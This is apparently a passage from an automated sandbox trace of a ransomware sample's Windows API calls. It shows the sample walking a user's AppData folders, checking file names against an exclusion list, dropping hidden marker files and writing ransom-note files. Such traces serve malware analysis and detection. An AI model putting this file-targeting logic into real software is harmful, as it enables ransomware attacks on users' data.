nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.145] FlushFileBuffers (hFile=0x298) returned 1 [0063.146] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.146] CloseHandle (hObject=0x298) returned 1 [0063.147] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData") returned 91 [0063.147] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.147] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a1999, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1c652, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef444aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.147] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.147] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.147] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.147] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.147] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a1999, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1c652, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef444aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.147] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.147] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.147] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.147] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.147] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.147] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef444aa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef444aa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef6a7f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.147] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.147] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.147] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef444aa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef444aa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef6a7f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.148] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.148] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.148] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.148] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.148] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.149] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.149] CloseHandle (hObject=0x2a0) returned 1 [0063.149] CloseHandle (hObject=0x298) returned 1 [0063.149] GetCurrentThreadId () returned 0xd98 [0063.149] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0063.149] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC" [0063.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1239b0 | out: hHeap=0xe0000) returned 1 [0063.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0063.149] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC" [0063.149] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\" [0063.149] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0063.149] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.152] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.155] FlushFileBuffers (hFile=0x298) returned 1 [0063.156] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.156] CloseHandle (hObject=0x298) returned 1 [0063.157] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC") returned 86 [0063.157] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.157] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x67c7ba3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x391dfc11, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeef6a7f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.157] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.157] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.157] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.157] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.157] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x67c7ba3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x391dfc11, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeef6a7f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.157] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.157] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.157] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.157] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.157] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.157] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef6a7f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef6a7f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef6a7f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.157] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.157] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.157] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1b57a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x67ede02, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0063.157] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0063.158] lstrcpyW (in: lpString1=0x130ebe6, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0063.158] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0063.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0063.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116110 [0063.158] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122088 [0063.158] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1b98c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x67ede02, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0063.158] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.158] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.159] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0063.159] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0063.159] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0063.159] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0063.159] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0063.159] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0063.159] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0063.159] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0063.159] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0063.159] lstrcpyW (in: lpString1=0x130ebe6, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0063.159] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0063.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0063.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116450 [0063.159] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x122268 [0063.159] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1bda6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x67ede02, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0063.159] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0063.159] lstrcpyW (in: lpString1=0x130ebe6, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0063.159] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0063.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0063.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116930 [0063.160] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x121f88 [0063.160] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1c1bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x67ede02, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0063.160] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0063.160] lstrcpyW (in: lpString1=0x130ebe6, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0063.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0063.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x122cc0 [0063.160] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x1220a8 [0063.160] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1c1bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x67ede02, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0063.160] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.160] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.160] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.161] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.161] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.161] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.161] CloseHandle (hObject=0x2a0) returned 1 [0063.161] CloseHandle (hObject=0x298) returned 1 [0063.161] GetCurrentThreadId () returned 0xd98 [0063.161] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0063.161] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp" [0063.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122cc0 | out: hHeap=0xe0000) returned 1 [0063.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0063.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp" [0063.162] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\" [0063.162] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0063.162] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.165] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.168] FlushFileBuffers (hFile=0x298) returned 1 [0063.169] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.169] CloseHandle (hObject=0x298) returned 1 [0063.169] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp") returned 91 [0063.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.170] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1c1bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef90a44, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.170] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.170] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.170] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.170] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.170] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1c1bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef90a44, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", 